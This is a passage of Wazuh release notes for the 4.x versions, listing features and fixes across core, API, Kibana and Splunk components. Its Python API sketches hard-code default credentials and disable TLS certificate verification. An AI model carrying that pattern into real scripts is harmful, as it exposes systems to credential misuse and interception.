  • #3056 Wazuh adds a new Stats section on the Agent data overview page that allows you to see the agent information retrieved by /agents/{agent_id}/stats/logcollector API endpoint.

  • #3069 A new vulnerability inventory is now added to the Vulnerability module, allowing you to see data on the CVE that affect your monitored agents.

  • #2925 In the Security events module, the Rows per page option of the Explore agent section is now configurable.

  • #3051 New reminder message and restart button are now displayed in the Rules, Decoders, and CDB lists sections of the management menu for you to restart the cluster or management after importing a file.

  • #3061 The API Console feature of the Tools menu now includes a logtest PUT sample for you to have as a reference (a request sketch follows this list).

  • #3109 A new button is added for you to recheck the API connection during a health check.

  • #3111 Wazuh adds a new wazuh-statistics template and new mapping for the indices.

  • #3126 When you deploy a new agent, a new link to the Wazuh documentation is added under the Start the agent step of the process for you to check if the connection to the manager is successful after adding a new agent.

  • #3238 When you deploy a new agent, a warning message is shown under the Install and enroll the agent step of the process to warn you about running the command on a host with an agent already installed. This action causes the agent package to be upgraded without enrolling the agent.

  • #2892 In the Integrity monitoring module, the Top 5 users result table is now changed to improve user experience.

  • #3080 The editing process of the allow_run_as user property is now adapted to the new PUT /security/users/{user_id}/run_as endpoint.

  • #3046 Some ossec references are now renamed to follow Wazuh unified standard.
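
The Ruleset Test tool and the logtest PUT sample mentioned in #3061 above rely on the manager's logtest endpoint. The sketch below shows what such a request could look like from a script; the base URL, credentials, body fields, and the sample log line are assumptions based on a typical syslog test.

```python
# Minimal sketch: testing a sample log against the ruleset through the
# logtest API, similar to what the Ruleset Test tool does in the UI.
# URL, credentials, and body fields are assumptions to verify against the
# API reference for your version.
import requests

BASE = "https://localhost:55000"   # assumed Wazuh API address

# Token obtained as in the earlier sketches.
token = requests.get(f"{BASE}/security/user/authenticate",
                     auth=("wazuh", "wazuh"), verify=False).json()["data"]["token"]
headers = {"Authorization": f"Bearer {token}"}

payload = {
    "log_format": "syslog",                    # format of the sample event
    "location": "master->/var/log/auth.log",   # assumed location string
    "event": "Dec  9 22:15:03 host sshd[123]: "
             "Failed password for root from 10.0.0.5 port 22 ssh2",
}
result = requests.put(f"{BASE}/logtest", headers=headers,
                      json=payload, verify=False).json()
print(result["data"].get("output", {}))
```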

Resolved issues

This release resolves known issues.

Wazuh Kibana plugin

Reference

Description

#3088

Only authorized agents are shown in the Agents stats and Visualizations dashboard.

#3095

Pending status option for agents is now included on the Agents overview page.

#3097

Index pattern setting is now applied when choosing from existing patterns.

#3108

An issue with space character missing on the deployment command when UDP is configured is now fixed.

#3110

When a node is selected in the Analysis Engine section of the Statistics page, you can now correctly see the statistics of the selected node.

#3114

When selecting a MITRE technique in the MITRE ATT&CK module, the changed date filter of the flyout window no longer modifies the main date filter as well.

#3118

An issue with the name of the TCP sessions visualization is now fixed and the average metric is now changed to total TCP sessions.

#3120

Only authorized agents are correctly shown on the Events and Security alerts tables.

#3122

In the Agents module, Last keep alive data is now displayed correctly within the panel.

#3128

Wazuh Kibana plugin no longer redirects to the Settings page instead of the Overview page after a health check.

#3144

An issue with the Wazuh logo path in the Kibana menu when server.basePath setting is used is now fixed.

#3152

An issue related to a deprecated endpoint for creating agent groups is now fixed.

#3163

This fix resolves an issue in the checking process for the TCP protocol in the Deploy a new agent window.

#3181

An issue with RBAC with agent group permissions is fixed. Now, when authorized agents are specified by their group instead of their IDs, you can successfully access the Security configuration assessment module, the Integrity monitoring module, and the Configuration window on the Agents page.

#3232

The index pattern is now successfully created when performing the health check, preventing an API-conflict error during this process.

#3569

Windows updates section is no longer displayed incorrectly when generating PDF reports for Linux agent inventories.

#3574

Error logging is now improved and some unnecessary error messages are removed.

Wazuh Splunk app
What's new

This release includes new features or enhancements.

  • #1024 In Discover view, the search query is changed to show the alert’s evolution.

  • #1066 In the Agents window of the Groups page, a new link is added to the result table to access Agent view.

  • #1052 Wazuh is now compatible with Python3. Python2 is now deprecated and removed.

  • #1058 The create group POST request is adapted to the latest Wazuh API changes.

Resolved issues

This release resolves known issues.

Splunk

Reference

Description

#944

Wazuh tools are now renamed to follow Wazuh unified standard. ossec-control is now wazuh-control and ossec-regex is now renamed as wazuh-regex.

#945

Wazuh daemons are now renamed to follow Wazuh unified standard.

#1020

An issue related to token cache duration is now fixed.

#1042

An issue with dynamic column widths in the agents PDF report is now fixed.

#1045

The issue related to the app not loading when it is not connected to the API is now fixed and information is displayed correctly.

#1046

A styling issue with success toast message for saving agent configuration is now fixed.

#1059

A minor styling issue is now fixed and Export button on the Export Results window now works correctly when you hover over it.

#1063

A new error handler message is now added to the Alerts window of the Configuration page.

#1069

The error message that appears when adding an API and the connection fails is now fixed and the message content text is shown correctly.

#1021

An issue with the error toast message in search handler is fixed when the connection with forwarder fails.

Changelogs

More details about these changes are provided in the changelog of each component:

4.1.5 Release notes - 22 April 2021

This section lists the changes in version 4.1.5. More details about these changes are provided in the changelog of each component:

Wazuh core
Resolved issues

Reference

Description

4cbd1e8

Issue is fixed in Vulnerability Detector that made modulesd crash while updating the NVD feed due to a missing CPE entry.

Wazuh Kibana plugin
What's new
  • Wazuh Kibana plugin is now compatible with Wazuh 4.1.5.

Wazuh Splunk app
What's new
  • Wazuh Splunk app is now compatible with Wazuh 4.1.5.

4.1.4 Release notes - 25 March 2021

This section lists the changes in version 4.1.4. More details about these changes are provided in the changelog of each component:

Wazuh core
Resolved issues

This release resolves known issues.

Cluster

Reference

Description

#8017

Issue with the Wazuh manager worker nodes reconnection after restarting the Wazuh master node is fixed. Workers now successfully reconnect to the master node after it is restarted.

Wazuh Kibana plugin
What's new

This release includes new features or enhancements.

  • Wazuh Kibana plugin is now compatible with Wazuh 4.1.4.

4.1.3 Release notes - 23 March 2021

This section lists the changes in version 4.1.3. More details about these changes are provided in the changelog of each component:

Wazuh core
What's new

This release includes new features or enhancements.

External dependencies:

  • #7943 Python is upgraded from 3.8.6 to 3.9.2. This upgrading includes several Python dependencies to be compatible with the latest stable version.

Resolved issues

This release resolves known issues.

Core

Reference

Description

#7870

In File Integrity Monitoring, the issue with files' modification time on Windows is fixed. That prevents the agent from producing this error: ERROR: (6716): Could not open handle for 'c:\test\untitled spreadsheet.xlsx'. Error code: 32

#7873

Issue in Wazuh DB that truncated the output of the agents' status query towards the cluster is fixed.

API

Reference

Description

#7906

Validation for absolute and relative paths is modified to avoid inconsistencies. These changes in the validator.py module improve security verifications of paths.

Wazuh Kibana plugin
What's new

This release includes new features or enhancements.

  • #2985 In the Settings module, you can now create and configure a new index pattern after changing the default one. This improves user experience when retrieving data from indices for queries and visualizations.

  • #3039 In the Agents module, the node name information is now detailed in the agents' list and in the agent information section. With this enhancement, you can better visualize the cluster node to which each agent is reporting.

  • #3041 A new loading view is displayed when the user is loading some tabs. This improves user experience since permission prompts are no longer shown while updating a tab.

  • #3047 All date labels are changed to Kibana formatting time zone for consistency.

  • #3048 Custom messages are now added for each possible run_as setup. This improves the warning messages whenever run_as is not allowed.

  • #3049 When selecting a default API, the toast message is cleaner and shows the API host ID.

Resolved issues

This release resolves known issues.

Reference

Description

#3028

In Role mapping, the issue that caused unnecessary operators to be added when editing the role mapping is now fixed and no longer affects usability.

#3057

Issue with rule filter not applied when selecting a Rule ID in another module is now fixed. Now, the selected Rule ID is correctly applied throughout all modules.

#3062

Issue with changing master node configuration is now fixed. Now, the Wazuh API connection checking is completed successfully and no longer triggers an error when changing the configuration of the master node.

#3063

Issue with Wazuh crashing after reloading due to caching bundles is now fixed. Improved validations now prevent this issue from reoccurring.

#3066

Wrong variable declaration for macOS agents is now fixed.

#3084

Improved error handling when an invalid rule is configured. The file saving algorithm now prevents files with incorrect configurations from being saved.

#3086

Some errors in the Events table are now fixed. Action buttons of the rule.mitre.tactic column are repositioned correctly and Event links work after you add, remove, or move a column.

4.1.2 Release notes - 8 March 2021

This section lists the changes in version 4.1.2. More details about these changes are provided in the changelog of each component:

Wazuh core
Changed

Core

  • The default value of the agents_disconnection_time option is set to 10 minutes, preventing false-positive alerts of disconnected agents.

  • In Remoted, the warning log of messages sent to disconnected agents is now changed to level-1 debug log.

API

  • API logs showing request parameters and body are now generated with API log level info instead of log level debug.

External dependencies

  • aiohttp is upgraded from 3.6.2 to 3.7.4.

Fixed
  • Issue with unit tests that randomly caused false failures is fixed.

  • Analysisd configuration now applies the json_null_fields setting successfully.

  • In Remoted, the ipv6 option checking ignores invalid values correctly.

  • Issue with rids_closing_time option checking in Remoted is now fixed.

Wazuh Kibana plugin
Changed
  • Some empty state messages have been improved.

  • The example host configuration in Add new API section now includes the setting run_as.

Fixed
  • SCA policy detail no longer shows name and check results of another policy.

  • Alerts are now correctly displayed in the alerts table when switching pinned agents.

  • In Role mapping, issue with data loading and Create Role mapping button is now fixed.

  • Pagination in SCA checks table when expanding a row now works correctly.

  • Issue with agent table showing suggestions with manager information is now fixed.

  • Loading of inventory is now disabled when a request fails.

  • Single nodes can be restarted using optional node-name parameter in cluster restart requests.

  • Pinned agents successfully trigger new filtered queries.

  • Issue with overlay of Wazuh menu when Kibana menu is opened or docked is now fixed.

4.1.1 Release notes - 25 February 2021

This section lists the changes in version 4.1.1. More details about these changes are provided in the changelog of each component:

Wazuh core
Added

External dependencies

  • Added cython (0.29.21) library to Python dependencies.

  • Added xmltodict (0.12.0) library to Python dependencies.

Changed

External dependencies

  • Upgraded Python version from 3.8.2 to 3.8.6.

  • Upgraded Cryptography python library from 3.2.1 to 3.3.2.

  • Upgraded cffi python library from 1.14.0 to 1.14.4.

API

  • Added raw parameter to GET /manager/configuration and GET cluster/{node_id}/configuration endpoints to load ossec.conf in XML format.

Fixed

API

  • An error with the RBAC permissions in the GET /groups endpoint.

  • A bug with Windows registries when parsing backslashes.

  • An error with the RBAC permissions when assigning multiple agent:group resources to a policy.

  • An error with search parameters when using special characters.

AWS Module

  • A bug that caused an error when attempting to use an IAM Role with CloudWatchLogs service.

Framework

  • A race condition bug when using RBAC expand_group function.

  • The migration process to overwrite default RBAC policies.

Core

  • A bug in the Windows agent that did not respect the buffer EPS limit.

  • A bug in Integratord that might lose alerts from Analysisd due to a race condition.

  • Silenced the error message when the Syslog forwarder reads an alert with no rule object.

  • A memory leak in Vulnerability Detector when updating NVD feeds.

  • Prevented FIM from raising false positives about group name changes due to a thread unsafe function.

Removed

API

  • Deprecated /manager/files and /cluster/{node_id}/files endpoints.

Wazuh Kibana plugin
Added
  • New prompt to show unsupported module for the selected agent.

  • Added an X-Frame-Options header to the backend responses.

Changed
  • Added toast with refresh button when new fields are loaded in dashboard.

  • Migrated the Wazuh API endpoints for manager and cluster files and their corresponding RBAC.

  • Enhanced generic statusCode error message to be more user friendly.

Fixed
  • A login error when AWS Elasticsearch and ODFE are used.

  • An error message that was displayed when changing a group configuration even when the user had the right permissions.

  • Disabled switch visual edit button when JSON content is empty in Role Mapping.

  • Disappearing menu and blank content when an unsupported agent (OS) is selected.

  • Forcing a non-numeric filter value in a number type field applying a filter in the search bar of dashboards and events.

  • Wrong number of alerts that were shown in Security Events.

  • Search using uncommon characters in Management groups of agents.

  • The SCA policy stats that did not refresh.

  • AWS index fields loading even when no AWS alerts were found.

  • Date fields format in FIM and SCA modules.

  • Recurrent error message in Manage agents when the user has no permissions.

  • An issue that prevented editing empty rules and decoders files that already existed in the Wazuh manager.

  • Support for alerts index pattern with different IDs and names.

  • The unpin button in the selection modal of agents in the menu.

  • Close Wazuh API session when logging out from UI.

  • Missing && in macOS agent deployment command.

  • Prompt permissions on Mitre > Framework and Integrity monitoring > Inventory.

4.1.0 Release notes - 15 February 2021

This section lists the changes in version 4.1.0. More details about these changes are provided in the changelog of each component:

Highlights
  • Added support for regular expression negation and the PCRE2 format in rules and decoders (see the sketch after this list).

  • New ruleset test module managed by the analysis daemon allowing testing sessions of rules and decoders.

  • New upgrade module that provides simultaneous agent upgrades in a single node or cluster architecture.

  • The Vulnerability Detector now supports macOS agents. These agents must be updated to 4.1 to scan vulnerabilities.

  • Support for AWS load balancers logs: Application Load Balancer, Classic Load Balancer, and Network Load Balancer.

  • Removed the limit on the number of agents a manager can support.

  • New endpoints to query and manage Rootcheck data.

  • Support for Open Distro for Elasticsearch 1.12.0.

  • Support for Elastic Stack basic license 7.10.0 and 7.10.2.
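
As an illustration of the new ruleset syntax, the following hedged sketch combines a PCRE2 expression with negation in a custom rule. The rule ID, level, parent rule, and pattern are arbitrary examples, and the attribute names (type="pcre2", negate="yes") reflect the 4.1 syntax as described above; treat it as a sketch rather than a drop-in rule:

    <rule id="100010" level="5">
      <if_sid>5700</if_sid>
      <!-- PCRE2 pattern; negate="yes" makes the rule match when the pattern does NOT match -->
      <match type="pcre2" negate="yes">^Accepted\s+publickey</match>
      <description>sshd: authentication message that is not a public key login.</description>
    </rule>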

Wazuh core
Added

Core

  • Negation logic for rules.

  • Support for PCRE2 regular expressions in rules and decoders.

  • New ruleset test module managed by the analysis daemon allowing testing sessions of rules and decoders.

  • New upgrade module that provides simultaneous agent upgrades in a single node or cluster architecture. WPK upgrade functionality has been moved to this module.

  • New task module that collects and manages all the upgrade tasks executed in the agents or managers.

  • Made the time interval used to detect that an agent has disconnected configurable. The DISCON_TIME parameter is deprecated.

  • Vulnerability Detector support for macOS.

  • Capability to perform FIM on values in the Windows Registry.

API

  • New endpoints to query and manage rootcheck data.

  • New endpoint to check task status.

  • New endpoints to run the logtest tool and delete a logtest session.

  • debug2 mode for API log and improved debug mode.

AWS module

  • Support for AWS load balancers logs: Application Load Balancer, Classic Load Balancer, and Network Load Balancer.

Framework

  • New framework modules to use the logtest tool.

  • Improved q parameter on rules, decoders, and cdb-lists modules to allow multiple nested fields.

Changed

Core

  • Removed limit on the number of agents that a manager can support.

  • Migration of rootcheck results to Wazuh DB to remove the files with the results of each agent.

  • New mechanism to close RIDS files when agents are disconnected.

  • Moved CA configuration section to verify WPK signatures from the active-response section to the agent-upgrade section.

  • The ossec-logtest tool is deprecated and replaced by wazuh-logtest, which uses a new testing service integrated in Analysisd.

  • Modified the error message to debug when multiple daemons attempt to remove an agent simultaneously.

  • Replaced the error message with a warning when the agent fails to reach a module.

API

  • The status parameter behavior in the DELETE /agents endpoint to enhance security.

  • Allow agent upgrade endpoints to accept a list of agents, maximum 100 agents per request.

  • Improved input validation regexes for names and array_names.

Framework

  • Refactored framework to work with the new upgrade module.

  • Refactored agent upgrade CLI to work with the new upgrade module. It distributes petitions in a clustered environment.

  • Rule and decoder details structure to support PCRE2.

  • Refactored framework to adapt agent status changes in wazuh.db.

  • Improved the performance of AWS Config integration by removing alert fields with variables such as Instance ID in its name.

Fixed

Core

  • An error in analysisd when getting the ossec group ID.

  • Prevented FIM from reporting configuration error when patterns in settings match no files.

  • The array parsing when building JSON alerts.

  • Added Firefox ESR to the CPE helper to distinguish it from Firefox when looking for vulnerabilities.

  • The evaluation of packages from external sources with the official vendor feeds in Vulnerability Detector.

  • The handling of duplicated tags in the Vulnerability Detector configuration.

  • The validation of hotfixes gathered by Syscollector.

  • The reading of the Linux OS version when /etc/os-release does not provide it.

  • A false positive when comparing the minor target of CentOS packages in Vulnerability Detector.

  • A zombie process leak in modulesd when using commands without a timeout.

  • A race condition in Remoted that might create agent-group files with wrong permissions.

  • A warning log in Wazuh DB when upgrading the global database.

  • A bug in FIM on Windows that caused false positives due to changes in the host timezone or the daylight saving time when monitoring files in a FAT32 filesystem.

API

  • An error with /groups/{group_id}/config endpoints (GET and PUT) when using complex localfile configurations.

Framework

  • A cluster_control bug that caused an error message when running wazuh-clusterd in foreground.

Wazuh Kibana plugin
Added
  • Check the Kibana max buckets config by default in health-check and increase them.

  • A warning in the role mapping section if the run_as setting is disabled.

  • A label to indicate that the wui_ rules only apply to the wazuh-wui API user.

Changed
  • Adapted the Wazuh Kibana plugin to the new Kibana platform.

  • Moved the Wazuh config directory from the Kibana /usr/share/kibana/optimize directory to /usr/share/kibana/data.

  • Support on FIM Inventory Windows Registry for the new scheme with registry_key and registry_value from syscheck.

  • Uncheck agents after an action in agents groups management.

  • Rule files with invalid content are no longer saved when editing or creating a rule.

  • Replaced Wazuh API user with wazuh-wui in the default configuration.

  • Add agent id to the reports name in Agent Inventory and Modules.

  • Allow access to the Agents section with agent:group resource permission.

  • Added vulnerabilities module for macOS agents.

Fixed
  • Server error Invalid token specified: Cannot read property 'replace' of undefined.

  • Show empty rules and decoders files.

  • Wrong hover texts in CDB list actions.

  • Access to forbidden agents information when exporting agents list.

  • The complex search using the Wazuh API query filter in search bars.

  • Validation to check if userPermissions are not ready yet.

  • Agents table OS field sorting: Changed agents table field os_name to os.name,os.version to make it sortable.

  • Different parsed datetime between agent detail and agents overview table.

  • An error with the agents status pie chart tooltip that did not display the number of agents on the first hover.

  • Menu crash when Solaris agents are selected.

  • Report's creation dates set to 1970-01-01T00:00:00.000Z in some OS.

  • Missing commands for Ubuntu/Debian and CentOS on the Deploy new agent section.

  • Different hours displayed on Alerts List section in some dashboards.

  • Permissions to access agents when policy agent:read is set.

  • SCA permissions for agents views and dashboards.

  • Settings of statistics indices creation that did not work properly.

Wazuh ruleset
Added
  • The ruleset update tool is now able to bypass the version check with the force option.

  • New AWS Config-History rules to make it more granular by including every item status supported.

  • Several hundred new SCA policies for various operating systems.

Changed
  • FIM rules have been adapted to the improvements for Windows Registry monitoring.

Fixed
  • Updated MITRE techniques in web rules.

  • Sonicwall predecoder to accept whitespaces at the beginning.

4.0.4 Release notes - 14 January 2021

This section lists the changes in version 4.0.4. More details about these changes are provided in the changelog of each component:

Wazuh core
Added

API

  • Missing secure headers for API responses to fulfill the OWASP recommendations.

  • New option to disable uploading configurations containing remote commands.

  • New option to choose the SSL ciphers. Default value TLSv1.2.

Changed

API

  • Restore and update API configuration endpoints have been deprecated.

  • JWT token expiration time set to 15 minutes.

Fixed

API

  • Fixed a path traversal flaw (CVE-2021-26814) affecting versions 4.0.0 to 4.0.3 in the /manager/files and /cluster/{node_id}/files endpoints. Due to incomplete input validation, an authenticated user could exploit the /manager/files URI to inject arbitrary code into the API service script and execute it with administrative privileges. Thanks to Davide Meacci for reporting this vulnerability.

Framework

  • Bug with client.keys file handling when adding agents without authd.

Core

  • The purge of the Redhat vulnerabilities database before updating it.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.4.

4.0.3 Release notes - 30 November 2020

This section lists the changes in version 4.0.3. More details about these changes are provided in the changelog of each component:

Wazuh core
Fixed

API

  • API timeouts with GET /agents call in loaded cluster environments.

  • Timeout issue related to GET /manager/configuration/validation and GET /cluster/configuration/validation in big environments.

  • Timeout and performance issue related to the GET /overview/agents request in loaded cluster environments.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.3.

4.0.2 Release notes - 24 November 2020

This section lists the changes in version 4.0.2. More details about these changes are provided in the changelog of each component:

Wazuh core
Added

Core

  • Version detection in the agent for macOS Big Sur.

Changed

API

  • GET /agents/summary/os, GET /agents/summary/status and GET /overview/agents will no longer consider 000 as an agent.

  • Increased to 64 the maximum number of characters that can be used in security users, roles, rules, and policies names.

Fixed

API

  • Error with POST /security/roles/{role_id}/rules when removing role-rule relationships with admin resources.

  • Timeout error with GET /manager/configuration/validation when using it in a slow environment.

Framework

  • Error with some distributed requests when the cluster configuration is empty.

  • Special characters in default policies.

Core

  • Bug in Remoted that limited the maximum agent number to MAX_AGENTS-3 instead of MAX_AGENTS-2.

  • Error in the network library when handling disconnected sockets.

  • Error in FIM when handling temporary files and registry keys exceeding the path size limit.

  • Bug in FIM that stopped monitoring folders pointed by a symbolic link.

  • Race condition in FIM that could cause Syscheckd to stop unexpectedly.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.2.

Changed
  • An alert summary table is now included in PDF reports of all modules.

  • Authentication with run_as is now available for other users besides wazuh-wui.

  • A notification is now displayed when no agents have been registered.

  • API security entities between 0 and 99 are now reserved.

Fixed
  • Manager restart in rule editor with Wazuh cluster enabled.

  • Restored the tables in the agents reports.

  • Corrected the subtraction of managers (agent 000) in agent count considering the RBAC permissions of the current user.

  • Changes done via a worker API were overwritten.

  • Default user field in Security Role mapping is now provided depending on whether ODFE or X-Pack is installed.

  • Bug that replaced index-pattern title with its ID during the updating process.

4.0.1 Release notes - 11 November 2020

This section lists the changes in version 4.0.1. More details about these changes are provided in the changelog of each component:

Wazuh core
Changed

Framework

  • Updated Python cryptography library to version 3.2.1.

Fixed

API

  • Added missing agent:group resource to the RBAC catalog. This prevented the Wazuh Kibana plugin from obtaining the correct information from the RBAC catalog.

  • Changed limit parameter behavior in GET sca/{agent_id}/checks/{policy_id} endpoint and fixed some information loss when paginating wdb.

  • Fixed an error with GET /security/users/me when logged in with run_as. This endpoint must return the permissions and information of the user who makes the request. However, when the user was authenticated through auth_context, this endpoint did not return the permissions granted by this method.

Framework

  • Fixed zip files compression and handling in cluster integrity synchronization.

Core

  • Fixed version matching when assigning a feed in the Vulnerability Detector.

  • Improved permissions on Windows agent. Users with limited privileges will now be unable to read the contents of the Wazuh agent folder.

  • Fixed a bug that may lead the agent to crash when reading an invalid Logcollector configuration.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.1.

Fixed
  • Fixed icons that did not align correctly in Modules > Events.

  • Fixed statistics visualizations that did not show data.

  • Fixed error on loading CSS files.

  • Fixed search filter in the search bar in Module/SCA that was not working.

Wazuh ruleset
Fixed
  • Removed duplicated Windows rules for EventChannel. These extra rules were preventing certain events from triggering alerts.

4.0.0 Release notes - 23 October 2020

This section lists the changes in version 4.0.0. More details about these changes are provided in the changelog of each component:

Highlights
  • The agent enrollment is now performed on the main daemon initialization. There is no need to request a key using an external CLI anymore. Agents are now able to request a key from the manager on their own if no key was defined on startup or if the manager has rejected the connection (agents on version 3.x are still 100% compatible with version 4.x).

  • Wazuh API RBAC: Configure users, roles, and policies to manage access permissions. The Wazuh WUI now permits granular control over access to resources depending on user roles, which allows enterprises to manage user accounts that fulfill different functions in the security of the environment.

  • Wazuh API is now embedded in the Wazuh manager.

  • Wazuh manager and agents will use TCP as the default communication protocol.

  • The Windows agent MSI installer is now signed using DigiCert instead of GlobalSign. DigiCert is known for being present on more Windows versions, including the oldest ones.

  • FIM now implements a set of settings to control the disk usage of the module's temporary files. The diff option reports changes in monitored files by keeping a compressed copy of each file and checking whether it changes, which may use a lot of disk space. Wazuh 4.0 introduces new capabilities to limit the space used, as shown in the sketch below.
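
A hedged configuration sketch of these limits, assuming the <diff> block inside <syscheck> used by the report changes feature; the size values are only illustrative:

    <syscheck>
      <diff>
        <!-- Global cap for all compressed copies kept by report_changes -->
        <disk_quota>
          <enabled>yes</enabled>
          <limit>1GB</limit>
        </disk_quota>
        <!-- Per-file cap: larger files are not copied for diffing -->
        <file_size>
          <enabled>yes</enabled>
          <limit>50MB</limit>
        </file_size>
      </diff>
    </syscheck>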

Breaking changes
  • The agent-auth tool starts the deprecation cycle (to be deprecated in v5.0.0). The agent registration on demand will still be available using CLI.

  • The API is now embedded in the Wazuh manager, no wazuh-api package will be installed anymore.

  • The Wazuh manager and agents no longer use UDP as the default communication protocol. TCP is enabled by default (see the sketch after this list).

  • OpenSCAP policies are removed from the RPM and DEB packages. Policies present in the agent installation folder will be removed.
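
For reference, a minimal agent-side sketch of the connection block with the new default made explicit; the manager address is a placeholder and the port value is only illustrative:

    <client>
      <server>
        <address>MANAGER_IP</address>
        <port>1514</port>
        <!-- TCP is now the default; set udp only if the old behavior is required -->
        <protocol>tcp</protocol>
      </server>
    </client>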

Wazuh core
Added

Wazuh API

  • Embedded the Wazuh API with the Wazuh manager; there is no need to install the Wazuh API separately.

  • Migrated Wazuh API server from NodeJS to Python.

  • Added asynchronous aiohttp server for the Wazuh API.

  • The new Wazuh API is approximately 5 times faster on average.

  • Added OpenAPI based Wazuh API specification.

  • Improved Wazuh API reference documentation based on OpenAPI spec using redoc.

  • Added a new yaml Wazuh API configuration file.

  • Added new endpoints to manage API configuration and deprecated configure_api.sh.

  • Added RBAC support to Wazuh API.

  • Added new endpoints for Wazuh API security management.

  • Added SQLAlchemy ORM based database for RBAC.

  • Added a new JWT authentication method.

  • Wazuh API up and running by default in all nodes for a clustered environment.

  • Added new and improved error handling.

  • Added tavern and docker based Wazuh API integration tests.

  • Added new and unified Wazuh API response structure.

  • Added new endpoints for Wazuh API users management.

  • Added a new endpoint to restart agents that belong to a node.

  • Added and improved q filter in several endpoints.

  • Tested and improved Wazuh API security.

  • Added DDOS blocking system.

  • Added brute force attack blocking system.

  • Added content-type validation.

  • Added and updated framework unit tests to increase coverage.

  • Added improved support for monitoring paths from environment variables.

  • Added auto-enrollment capability. Agents are now able to request a key from the manager if the current key is missing or wrong.

Vulnerability Detector

  • Redhat vulnerabilities are now fetched from OVAL benchmarks.

  • Debian vulnerable packages are now fetched from the Security Tracker.

  • The Debian Security Tracker feed can be loaded from a custom location.

  • Allow compressed feeds for offline updates.

  • The manager now updates the MSU feed automatically.

  • CVEs with no affected version defined in all the feeds are now reported.

  • CVEs vulnerable for the vendor and missing in the NVD are now reported.

Changed
  • Changed multiple Wazuh API endpoints.

  • Refactored framework module in SDK and core.

  • FIM Windows events handling refactored.

  • Changed framework to access global.db using wazuh-db.

  • Changed agent-info synchronization task in Wazuh cluster.

Fixed
  • Fixed an error with the last scan time in syscheck endpoints.

  • Added support for monitoring directories that contain commas.

  • Fixed a bug where configuring a directory to be monitored as realtime and whodata resulted in realtime prevailing.

  • Fixed using an incorrect mutex while deleting inotify watches.

  • Fixed a bug that could cause multiple FIM threads to request the same temporary file.

  • Fixed a bug where deleting a file permanently in Windows would not trigger an alert.

  • Fixed a typo in the file monitoring options log entry.

  • Fixed an error where monitoring a drive in Windows under scheduled or realtime mode would generate alerts from the recycle bin.

  • When monitoring a drive in Windows in the format U:, it will monitor U:\ instead of the agent's working directory.

  • Fixed a bug where monitoring a drive in Windows with recursion_level set to 0 would trigger alerts from files inside its subdirectories.

  • Fixed an Azure wodle dependency error. The package azure-storage-blob>12.0.0 does not include a component used.

Vulnerability Detector

  • Vulnerabilities of Windows Server 2019 that do not affect Windows 10 were not being reported.

  • Vulnerabilities patched by a Microsoft update with no supersedence were not being reported.

  • Vulnerabilities patched by more than one Microsoft update were not being evaluated against all the patches.

  • Duplicated alerts in Windows 10.

  • Syscollector now discards hotfixes that are not fully installed.

  • Syscollector now collects hotfixes that were not being parsed.

Removed
  • Removed Wazuh API cache endpoints.

  • Removed Wazuh API rootcheck endpoints.

  • Deprecated Debian Jessie and Wheezy for Vulnerability Detector (EOL).

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.0.

  • Support for Kibana v7.9.1 and v7.9.2.

  • Support for Open Distro 1.10.1.

  • Added an RBAC security layer integrated with Open Distro and X-Pack.

  • Added remoted and analysisd statistics.

  • Expand supported deployment variables.

  • Added new configuration view settings for GCP integration.

  • Added logic to change the metafields configuration of Kibana.

Changed
  • Migrated the default index-pattern to wazuh-alerts-*.

  • Removed the known-fields functionality.

  • Security Events dashboard redesigned.

  • Redesigned the app settings configuration with categories.

  • Moved the wazuh-registry file to Kibana optimize folder.

Fixed
  • Format options in wazuh-alerts index-pattern are not overwritten now.

  • Prevent blank page in detail agent view.

  • Navigable agents name in Events.

  • Index pattern is not being refreshed.

  • Reporting fails when agent is pinned and compliance controls are visited.

  • Reload rule detail does not work properly with the related rules.

  • Fix search bar filter in Manage agent of group.

Wazuh ruleset
  • Changed compliance rules groups and removed alert_by_email option by default.

  • Let the Ruleset update tool pick up the current version branch by default.

Wazuh packages
Added
  • Added Open Distro for Elasticsearch packages to Wazuh's software repository.

Changed
  • Wazuh services are no longer enabled nor started in a fresh install.

  • Wazuh services will be restarted on upgrade if they were running before upgrading them.

  • Wazuh API and Wazuh Manager services are unified in a single wazuh-manager service.

  • Wazuh plugin for Kibana package has been renamed.

  • Wazuh VM now uses Wazuh and Open Distro for Elasticsearch.

Fixed
  • Unit files for systemd are now installed on /usr/lib/systemd/system.

  • Improved the upgrade of unit files.

  • ossec-init.conf file now shows the build date for any system.

  • Fixed an error setting SCA file permissions on .deb packages.

Removed
  • The Wazuh API package has been removed. Now, the Wazuh API is embedded into the Wazuh Manager installation.

  • Removed OpenSCAP files and integration.

Wazuh documentation
Added
  • Added instructions to install Wazuh along with Open Distro for Elasticsearch.

  • Added scripts, created by the Wazuh team, that allow the user to install Wazuh and Elastic Stack automatically.

  • Added tabs in the installation guide to ease the navigation through the different options available.

  • Added a 'More installation alternatives' section that provides instructions on how to install Wazuh along with commercial options like Elastic Stack basic license or Splunk. This section also includes instructions on how to install Wazuh from sources.

Changed
  • Reorganized the installation guide to help the user through the installation process of Wazuh and Elastic Stack in a single section.

  • Split the installation guide in all-in-one installation and distributed deployment.

  • Reorganized the upgrade guide.

3.x

This section summarizes the most important features of each Wazuh 3.x release.

Wazuh version      Release date

3.13.6             19 September 2022
3.13.5             24 August 2022
3.13.4             30 May 2022
3.13.3             28 April 2021
3.13.2             22 September 2020
3.13.1             15 July 2020
3.13.0             22 June 2020
3.12.3             30 April 2020
3.12.2             9 April 2020
3.12.1             8 April 2020
3.12.0             24 March 2020
3.11.4             25 February 2020
3.11.3             28 January 2020
3.11.2             22 January 2020
3.11.1             10 January 2020
3.11.0             23 December 2019
3.10.2             23 September 2019
3.10.1             19 September 2019
3.10.0             18 September 2019
3.9.5              8 August 2019
3.9.4              7 August 2019
3.9.3              9 July 2019
3.9.2              10 June 2019
3.9.1              21 May 2019
3.9.0              2 May 2019
3.8.2              31 January 2019
3.8.1              24 January 2019
3.8.0              18 January 2019
3.7.2              17 December 2018
3.7.1              5 December 2018
3.7.0              10 November 2018
3.6.1              7 September 2018
3.6.0              29 August 2018
3.5.0              10 August 2018
3.4.0              24 July 2018
3.3.1              18 June 2018
3.3.0              8 June 2018
3.2.4              1 June 2018
3.2.3              28 May 2018
3.2.2              7 May 2018
3.2.1              2 March 2018
3.2.0              8 February 2018
3.1.0              22 December 2017
3.0.0              3 December 2017

